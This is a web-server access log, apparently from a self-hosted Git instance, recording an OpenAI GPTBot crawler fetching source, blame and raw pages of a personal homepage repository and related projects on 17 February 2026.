"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" -[17/Feb/2026:14:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" -[17/Feb/2026:14:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" [Client 74.7.227.38] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" -[17/Feb/2026:14:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" -[17/Feb/2026:14:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" -[17/Feb/2026:14:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" -[17/Feb/2026:14:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" -[17/Feb/2026:14:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" -[17/Feb/2026:14:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images" -[17/Feb/2026:14:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images" -[17/Feb/2026:14:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" -[17/Feb/2026:14:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" -[17/Feb/2026:14:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" -[17/Feb/2026:14:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" -[17/Feb/2026:14:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" -[17/Feb/2026:14:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12972] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" -[17/Feb/2026:14:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" -[17/Feb/2026:14:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11473] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" -[17/Feb/2026:14:38:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 317084] [Gzip 14.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:38:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 9951] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" -[17/Feb/2026:14:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15580] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" -[17/Feb/2026:14:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13682] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" -[17/Feb/2026:14:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14844] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" -[17/Feb/2026:14:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14233] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" -[17/Feb/2026:14:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13958] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" -[17/Feb/2026:14:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16507] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" -[17/Feb/2026:14:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2fassets%2fjs" [Client 74.7.227.38] [Length 46251] [Gzip 7.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" -[17/Feb/2026:14:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 15581] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" -[17/Feb/2026:14:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 42670] [Gzip 12.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:14:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 17895] [Gzip 10.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:14:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 22430] [Gzip 10.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:14:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15933] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:38:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13811] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" -[17/Feb/2026:14:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16940] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" -[17/Feb/2026:14:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 54917] [Gzip 18.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:14:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 14469] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:14:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 24988] [Gzip 10.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:14:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 123696] [Gzip 13.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:14:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 277998] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:14:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 12777] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:14:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 20851] [Gzip 9.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:14:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20374] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 